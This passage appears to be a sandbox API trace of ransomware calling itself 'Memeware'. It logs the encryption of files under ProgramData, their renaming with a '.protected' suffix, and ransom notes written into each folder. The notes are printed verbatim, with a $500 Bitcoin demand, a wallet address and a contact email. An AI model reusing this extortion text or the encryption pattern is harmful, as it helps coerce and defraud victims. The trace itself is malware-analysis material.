lpOverlapped=0x0) returned 1 [0074.588] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.588] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.588] CloseHandle (hObject=0xd4) returned 1 [0074.589] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.589] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.589] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0074.589] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.590] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.590] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.591] lstrlenA (lpString="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") returned 684 [0074.591] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.591] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.591] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0074.591] CloseHandle (hObject=0xb4) returned 1 [0074.592] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.592] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.592] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0074.592] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.593] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.593] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.594] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.594] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.594] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.594] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.594] CloseHandle (hObject=0xa4) returned 1 [0074.594] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.596] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="Windows") returned -1 [0074.596] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="Program Files") returned -1 [0074.609] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0074.609] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0074.609] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="System Volume Information") returned -1 [0074.609] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 82 [0074.609] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2=".") returned 1 [0074.609] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="..") returned 1 [0074.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*") returned 84 [0074.609] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.610] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\.") returned 84 [0074.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.610] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.611] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.611] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\..") returned 85 [0074.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.611] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.611] lstrcmpiW 
(lpString1="packages", lpString2="Program Files") returned -1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.611] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned 91 [0074.611] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.611] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.611] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*") returned 93 [0074.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.612] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.612] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.612] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.612] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.612] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.612] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\.") returned 93 [0074.612] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.612] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.612] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.612] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0074.612] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.612] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.612] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.612] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\..") returned 94 [0074.612] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.612] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.612] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Windows") returned -1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files") returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files (x86)") returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$Recycle.bin") returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="System Volume Information") returned 1 [0074.612] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned 114 [0074.612] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0074.612] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0074.613] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*") returned 116 [0074.613] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.613] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.613] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.613] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.613] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.613] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.613] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\.") returned 116 [0074.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.613] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.613] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.613] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.613] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.613] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.613] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.613] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\..") returned 117 [0074.613] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.613] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") 
returned -1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.614] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.614] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.614] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.614] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.614] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.614] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.614] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.614] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.614] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.799] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.799] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.799] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.799] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.915] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.915] CloseHandle (hObject=0xd8) returned 1 [0074.916] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 133 [0074.916] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package 
cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.protected")) returned 1 [0074.916] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.916] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Windows") returned -1 [0074.916] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files") returned 1 [0074.917] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files (x86)") returned 1 [0074.917] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$Recycle.bin") returned 1 [0074.917] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="System Volume Information") returned 1 [0074.917] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".protected") returned 0x0 [0074.917] lstrcmpW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0074.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".rar") returned 0x0 [0074.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".zip") returned 0x0 [0074.917] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.946] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.946] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.946] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.947] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.947] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.947] CloseHandle (hObject=0xd8) returned 1 [0074.947] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 150 